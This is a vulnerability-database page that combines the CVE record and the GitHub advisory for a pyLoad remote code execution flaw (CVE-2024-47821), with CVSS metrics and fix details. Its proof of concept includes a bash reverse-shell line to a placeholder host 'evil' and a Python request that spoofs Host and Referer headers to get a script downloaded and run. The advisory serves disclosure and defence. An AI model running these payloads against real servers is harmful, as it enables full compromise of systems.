cve-2024-47821
Vulnerability from cvelistv5
Published
2024-10-25 22:48
Modified
2024-10-28 19:41
Severity ?
EPSS score ?
Summary
pyLoad vulnerable to remote code execution by download to /.pyload/scripts using /flashgot API
References
| ▼ | URL | Tags | |
|---|---|---|---|
| security-advisories@github.com | https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g | Exploit, Vendor Advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "pyload",
"vendor": "pyload",
"versions": [
{
"lessThan": "0.5.0b3.dev87",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-47821",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-28T17:19:04.341270Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-28T19:41:54.018Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pyload",
"vendor": "pyload",
"versions": [
{
"status": "affected",
"version": "\u003c 0.5.0b3.dev87"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. Version 0.5.0b3.dev87 fixes this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-28T12:25:11.974Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g"
}
],
"source": {
"advisory": "GHSA-w7hq-f2pj-c53g",
"discovery": "UNKNOWN"
},
"title": "pyLoad vulnerable to remote code execution by download to /.pyload/scripts using /flashgot API"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-47821",
"datePublished": "2024-10-25T22:48:57.950Z",
"dateReserved": "2024-10-03T14:06:12.639Z",
"dateUpdated": "2024-10-28T19:41:54.018Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2024-47821\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-10-25T23:15:02.530\",\"lastModified\":\"2025-03-05T14:53:25.190\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. Version 0.5.0b3.dev87 fixes this issue.\"},{\"lang\":\"es\",\"value\":\"pyLoad es un gestor de descargas gratuito y de c\u00f3digo abierto. La carpeta `/.pyload/scripts` contiene scripts que se ejecutan cuando se completan determinadas acciones, por ejemplo, cuando finaliza una descarga. Al descargar un archivo ejecutable en una carpeta en /scripts y realizar la acci\u00f3n correspondiente, se puede lograr la ejecuci\u00f3n remota de c\u00f3digo en versiones de la rama 0.5 anteriores a 0.5.0b3.dev87. Se puede descargar un archivo en una carpeta de este tipo cambiando la carpeta de descarga a una carpeta en la ruta `/scripts` y utilizando la API `/flashgot` para descargar el archivo. Esta vulnerabilidad permite a un atacante con acceso cambiar la configuraci\u00f3n en un servidor pyload para ejecutar c\u00f3digo arbitrario y comprometer por completo el sistema. La versi\u00f3n 0.5.0b3.dev87 soluciona este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N\",\"baseScore\":2.3,\"baseSeverity\":\"LOW\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":0.8,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pyload:pyload:0.5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E5A06D79-6D64-41FB-9040-17E9630DF4E9\"}]}]}],\"references\":[{\"url\":\"https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
}
}
ghsa-w7hq-f2pj-c53g
Vulnerability from github
Published
2024-10-28 12:23
Modified
2024-10-28 12:24
Severity ?
9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
8.5 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P
8.5 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P
Summary
pyLoad vulnerable to remote code execution by download to /.pyload/scripts using /flashgot API
Details
Summary
The folder /.pyload/scripts has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved. A file can be downloaded to such a folder by changing the download folder to a folder in /scripts path and using the /flashgot API to download the file.
Details
Configuration changes
1. Change the download folder to /home/<user>/.pyload/scripts
2. Change permissions for downloaded files:
1. Change permissions of downloads: on
2. Permission mode for downloaded files: 0744
Making the request to download files
The flashgot API provides functionality to download files from a provided URL. Although pyload tries to prevent non-local requests from being able to reach this API, it relies on checking the Host header and the Referer header of the incoming request. Both of these can be set by an attacker to arbitrary values, thereby bypassing these checks.
Referer header check
def flashgot():
if flask.request.referrer not in (
"http://localhost:9666/flashgot",
"http://127.0.0.1:9666/flashgot",
):
flask.abort(500)
...
Host header check for local check
```
def local_check(func):
@wraps(func)
def wrapper(args, *kwargs):
remote_addr = flask.request.environ.get("REMOTE_ADDR", "0")
http_host = flask.request.environ.get("HTTP_HOST", "0")
if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (
"127.0.0.1:9666",
"[::1]:9666",
):
return func(*args, **kwargs)
else:
return "Forbidden", 403
return wrapper
```
Once the file is downloaded to a folder in the scripts folder, the attacker can perform the respective action, and the script will be executed
PoC
Create a malicious file. I have created a reverse shell ```
!/bin/bash
bash -i >& /dev/tcp/evil/9002 0>&1 ```
Host this file at some URL, for eg: http://evil
Create a request like this for the flashgot API. I am using download_finished folder as the destination folder. Scripts in this folder are run when a download is completed.
```
import requests
url = "http://pyload/flashgot" headers = {"host": "127.0.0.1:9666", "Referer": "http://127.0.0.1:9666/flashgot"}
data = {
"package": "download_finished",
"passwords": "optional_password",
"urls": "http://evil/exp.sh",
"autostart": 1,
}
response = requests.post(url, data=data, headers=headers)
``
When the above request is made, exp.sh will be downloaded to/scripts/download_finished folder`. For all subsequent downloads, this script will be run. Sending the request again causes a download of the file again, and when the download is complete, the script is run.
I also have a listener on my machine which receives the request from the pyload server. When the script executes, I get a connection back to my machine
Screenshots
Download folder
exp.sh is downloaded
Script is run
Reverse shell connection is received
Impact
This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pyload-ng"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.0b3.dev87"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-47821"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-28T12:23:29Z",
"nvd_published_at": "2024-10-25T23:15:02Z",
"severity": "HIGH"
},
"details": "### Summary\nThe folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file.\n\n### Details\n\n**Configuration changes**\n1. Change the download folder to `/home/\u003cuser\u003e/.pyload/scripts`\n2. Change permissions for downloaded files:\n 1. Change permissions of downloads: on\n 2. Permission mode for downloaded files: 0744\n\n**Making the request to download files**\n\nThe `flashgot` API provides functionality to download files from a provided URL. Although pyload tries to prevent non-local requests from being able to reach this API, it relies on checking the Host header and the Referer header of the incoming request. Both of these can be set by an attacker to arbitrary values, thereby bypassing these checks.\n\n*Referer header check*\n```\ndef flashgot():\n if flask.request.referrer not in (\n \"http://localhost:9666/flashgot\",\n \"http://127.0.0.1:9666/flashgot\",\n ):\n flask.abort(500)\n ...\n```\n*Host header check for local check*\n```\ndef local_check(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n remote_addr = flask.request.environ.get(\"REMOTE_ADDR\", \"0\")\n http_host = flask.request.environ.get(\"HTTP_HOST\", \"0\")\n\n if remote_addr in (\"127.0.0.1\", \"::ffff:127.0.0.1\", \"::1\", \"localhost\") or http_host in (\n \"127.0.0.1:9666\",\n \"[::1]:9666\",\n ):\n return func(*args, **kwargs)\n else:\n return \"Forbidden\", 403\n\n return wrapper\n```\n\nOnce the file is downloaded to a folder in the scripts folder, the attacker can perform the respective action, and the script will be executed\n\n\n### PoC\nCreate a malicious file. I have created a reverse shell\n```\n#!/bin/bash\nbash -i \u003e\u0026 /dev/tcp/evil/9002 0\u003e\u00261\n```\n\nHost this file at some URL, for eg: http://evil\n\nCreate a request like this for the `flashgot` API. I am using `download_finished` folder as the destination folder. Scripts in this folder are run when a download is completed.\n```\nimport requests\n\nurl = \"http://pyload/flashgot\"\nheaders = {\"host\": \"127.0.0.1:9666\", \"Referer\": \"http://127.0.0.1:9666/flashgot\"}\n\ndata = {\n \"package\": \"download_finished\", \n \"passwords\": \"optional_password\", \n \"urls\": \"http://evil/exp.sh\",\n \"autostart\": 1,\n}\n\n\nresponse = requests.post(url, data=data, headers=headers)\n```\nWhen the above request is made, exp.sh will be downloaded to `/scripts/download_finished folder`. For all subsequent downloads, this script will be run. Sending the request again causes a download of the file again, and when the download is complete, the script is run.\n\nI also have a listener on my machine which receives the request from the pyload server. When the script executes, I get a connection back to my machine\n\n### Screenshots\n*Download folder*\n\n\u003cimg width=\"672\" alt=\"1\" src=\"https://github.com/user-attachments/assets/77fc5202-bed2-41a2-98ae-9cb7b1315f76\"\u003e\n\n*`exp.sh` is downloaded*\n\n\u003cimg width=\"714\" alt=\"2\" src=\"https://github.com/user-attachments/assets/5e6e19db-2a5c-48f4-9973-817528b5b9ec\"\u003e\n\n*Script is run*\n\n\u003cimg width=\"714\" alt=\"3\" src=\"https://github.com/user-attachments/assets/34fbdaee-50ba-46a8-a372-ec8c91d03aa9\"\u003e\n\n*Reverse shell connection is received*\n\n\u003cimg width=\"314\" alt=\"4\" src=\"https://github.com/user-attachments/assets/4713d56e-e850-47ad-99b3-cab0c7bba800\"\u003e\n\n\n### Impact\nThis vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system\n",
"id": "GHSA-w7hq-f2pj-c53g",
"modified": "2024-10-28T12:24:45Z",
"published": "2024-10-28T12:23:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47821"
},
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyload/pyload"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
"type": "CVSS_V4"
}
],
"summary": "pyLoad vulnerable to remote code execution by download to /.pyload/scripts using /flashgot API"
}
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.